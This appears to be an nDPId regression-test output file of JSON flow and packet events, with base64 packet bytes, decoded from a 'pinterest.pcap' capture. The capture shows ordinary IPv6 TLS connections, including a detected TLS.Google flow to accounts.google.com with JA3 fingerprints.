-00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9523,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1605289716168,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":209,"pkt_l4_len":155,"thread_ts_msec":1605289716168,"pkt":"qtsDr8lk5EKm5WPyht1gB32\/AJsGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIBQAAAAAAACADqioBu9lanJS\/4e68gBgE1YEBAAABAQgKZPSVcMK4jAQXAwMAT0+KQ56NjlMHGW+d6G5ddduewRHnDyQJNOhFGSBeS16m4KVAja7XHlyuQrxKoq24Sn8bLVvUYgiRl0ogV926yAF+\/eBnK0DefdFCPgWpP6kXAwMAIh\/Eke2gVwnwKuWIWa9HbFAoJdRk5f1TigycRztSwvhmbFo="} -00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9663,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":3,"flow_last_seen":1605289716192,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289716192,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPSoAFFBABwgFAAAAAAAAIAMqAcsBIEmLB5kd7IUo3\/YpAbuqKr\/h7rzZWpyUgBALf8h0AAABAQgKwrkp2GT0lXA="} -00686{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9768,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1605289716168,"flow_last_seen":1605289716199,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":21339,"flow_avg_l4_payload_len":666,"midstream":1,"thread_ts_msec":1605289716199,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2003","src_port":43562,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 
-00687{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9768,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1605289716168,"flow_last_seen":1605289716199,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":21339,"flow_avg_l4_payload_len":666,"midstream":1,"thread_ts_msec":1605289716199,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2003","src_port":43562,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00620{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":14612,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289717548,"flow_last_seen":1605289717548,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605289717548,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::200d","src_port":40894,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14612,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1605289717548,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289717548,"pkt":"qtsDr8lk5EKm5WPyht1gD67DACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIFgAAAAAAACANn74Bu+7PaD4AAAAAoAL9ID+FAAACBAWgBAIICjGG9eUAAAAAAQMDBw=="} 
-00514{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14613,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1605289717572,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289717572,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgWAAAAAAAAIA0qAcsBIEmLB5kd7IUo3\/YpAbufvovR75juz2g\/oBJXgHfiAAACBAV4AQMDAwQCCArCuS86MYb15Q=="} -00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14614,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":3,"flow_last_seen":1605289717572,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289717572,"pkt":"qtsDr8lk5EKm5WPyht1gD67DACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIFgAAAAAAACANn74Bu+7PaD+L0e+ZgBAB+\/vbAAABAQgKMYb1\/cK5Lzo="} -00959{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":14615,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289717548,"flow_last_seen":1605289717572,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605289717572,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::200d","src_port":40894,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"accounts.google.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
-01000{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":14617,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605289717548,"flow_last_seen":1605289717605,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605289717605,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::200d","src_port":40894,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"accounts.google.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00613{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":14833,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289718346,"flow_last_seen":1605289718346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289718346,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::720","src_port":56940,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14833,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1605289718346,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289718346,"pkt":"qtsDr8lk5EKm5WPyht1gDn7LACAGQCoBywEgSYsHmR3shSjf9ikqBE5CAB0AAAAAAAAAAAcg3mwBu1MbKQQ2nwhTgBBf5ZGnAAABAQgKdGByysK4e5A="} -00620{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":14834,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289718347,"flow_last_seen":1605289718347,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289718347,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::2003","src_port":51472,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14834,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1605289718347,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289718347,"pkt":"qtsDr8lk5EKm5WPyht1gAqmhACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIFgAAAAAAACADyRABu5dQgwPxqZaUgBAHqUTfAAABAQgKOIhalcK4e5A="} 
-00620{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":14835,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289718347,"flow_last_seen":1605289718347,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289718347,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:806::200e","src_port":54308,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14835,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1605289718347,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289718347,"pkt":"qtsDr8lk5EKm5WPyht1gA2s5ACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIBgAAAAAAACAO1CQBu69kJZnLb6S2gBAFvhEdAAABAQgKcHSqtcK4e5A="} -00620{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":14836,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289718347,"flow_last_seen":1605289718347,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289718347,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80c::200a","src_port":57130,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14836,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1605289718347,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289718347,"pkt":"qtsDr8lk5EKm5WPyht1gAtTRACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIDAAAAAAAACAK3yoBu80FVZetwjn1gBAB9Q24AAABAQgKVxL7HMK4e4A="} -00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14837,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":2,"flow_last_seen":1605289718372,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289718372,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPSoETkIAHQAAAAAAAAAAByAqAcsBIEmLB5kd7IUo3\/YpAbvebDafCFNTGykFgBALfUzsAAABAQgKwrkyWnReVSQ="} -00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14838,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":2,"flow_last_seen":1605289718378,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289718378,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPSoAFFBABwgMAAAAAAAAIAoqAcsBIEmLB5kd7IUo3\/YpAbvfKq3COfXNBVWYgBALvWWfAAABAQgKwrkyYVcQ4ow="} 
-00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14839,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":1605289718378,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289718378,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPSoAFFBABwgWAAAAAAAAIAMqAcsBIEmLB5kd7IUo3\/YpAbvJEPGplpSXUIMEgBALh6bdAAABAQgKwrkyYTiGPeg="} -00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14840,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":2,"flow_last_seen":1605289718378,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289718378,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPSoAFFBABwgGAAAAAAAAIA4qAcsBIEmLB5kd7IUo3\/YpAbvUJMtvpLavZCWagBAL1W6tAAABAQgKwrkyYnBykDw="} -00612{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":14887,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289720502,"flow_last_seen":1605289720502,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289720502,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38402,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14887,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1605289720502,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289720502,"pkt":"qtsDr8lk5EKm5WPyht1gDE+lACAGQCoBywEgSYsHmR3shSjf9ikqBE5CAB0AAAAAAAAAAACElgIBuwZ3AS1n9K5wgBAD7qJGAAABAQgK1mI428K4iuQ="} -00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14888,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":2,"flow_last_seen":1605289720592,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289720592,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPSoETkIAHQAAAAAAAAAAAIQqAcsBIEmLB5kd7IUo3\/YpAbuWAmf0rnAGdwEugBAMdPzqAAABAQgKwrk63tZgJbc="} -00613{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":14889,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289722442,"flow_last_seen":1605289722442,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289722442,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2600:1901::7a0b::","src_port":46918,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14889,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1605289722442,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289722442,"pkt":"qtsDr8lk5EKm5WPyht1gCa8jACAGQCoBywEgSYsHmR3shSjf9ikmABkBAAB6CwAAAAAAAAAAt0YBu4XaMRXguiMogBAB9ZuaAAABAQgKldeDu8K4iwE="} -00612{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":14890,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289722610,"flow_last_seen":1605289722610,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289722610,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38406,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00503{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14890,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1605289722610,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289722610,"pkt":"qtsDr8lk5EKm5WPyht1gDvD\/ACAGQCoBywEgSYsHmR3shSjf9ikqBE5CAB0AAAAAAAAAAACElgYBu\/ADYY+SLdnAgBBf+pZ\/AAABAQgK1mJBF8K4kuY="} 
-00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14891,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":2,"flow_last_seen":1605289722621,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289722621,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPSYAGQEAAHoLAAAAAAAAAAAqAcsBIEmLB5kd7IUo3\/YpAbu3RuC6IyiF2jEWgBAM4PFAAAABAQgKwrlC85XVazg="} -00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14892,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":2,"flow_last_seen":1605289722642,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289722642,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPSoETkIAHQAAAAAAAAAAAIQqAcsBIEmLB5kd7IUo3\/YpAbuWBpIt2cDwA2GQgBAQS035AAABAQgKwrlDCNZgKSs="} -00620{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":14986,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289726574,"flow_last_seen":1605289726574,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289726574,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::2003","src_port":51446,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14986,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1605289726574,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289726574,"pkt":"qtsDr8lk5EKm5WPyht1gD7DqACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIFgAAAAAAACADyPYBuy7xct5PemhygBASWTvxAAABAQgKOIh6ucK4opo="} -00620{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":14987,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289726582,"flow_last_seen":1605289726582,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289726582,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::200a","src_port":47682,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14987,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":1605289726582,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289726582,"pkt":"qtsDr8lk5EKm5WPyht1gBy5HACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIFgAAAAAAACAKukIBu0Ah3sUn+OyVgBAB9Rf+AAABAQgKqS9zVcK4oqI="} 
-00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14988,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":2,"flow_last_seen":1605289726621,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289726621,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPSoAFFBABwgWAAAAAAAAIAMqAcsBIEmLB5kd7IUo3\/YpAbvI9k96aHIu8XLfgBAL06eYAAABAQgKwrlSlDiGZZ4="} -00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14989,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":2,"flow_last_seen":1605289726637,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289726637,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPSoAFFBABwgWAAAAAAAAIAoqAcsBIEmLB5kd7IUo3\/YpAbu6Qif47JVAId7GgBALvHMdAAABAQgKwrlSpKktXm0="} -00620{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":14990,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289728586,"flow_last_seen":1605289728586,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289728586,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:815::2003","src_port":48890,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14990,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1605289728586,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289728586,"pkt":"qtsDr8lk5EKm5WPyht1gDHlsACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIFQAAAAAAACADvvoBu4vV8Grv31OMgBACdmBfAAABAQgK5dFc6cK4oqI="} -00620{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":14991,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289728586,"flow_last_seen":1605289728586,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289728586,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::2004","src_port":40560,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14991,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":1605289728586,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289728586,"pkt":"qtsDr8lk5EKm5WPyht1gCU2wACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIFgAAAAAAACAEnnABu1oBJQ4\/rrWNgBAQLrKDAAABAQgKyRWFssK4oqI="} 
-00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14992,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":2,"flow_last_seen":1605289728804,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289728804,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPSoAFFBABwgVAAAAAAAAIAMqAcsBIEmLB5kd7IUo3\/YpAbu++u\/fU4yL1fBrgBALkLtnAAABAQgKwrla3eXPQIw="} -00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14993,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":2,"flow_last_seen":1605289728804,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289728804,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPSoAFFBABwgWAAAAAAAAIAQqAcsBIEmLB5kd7IUo3\/YpAbuecD+utY1aASUPgBAZXAuxAAABAQgKwrla48kTaxY="} 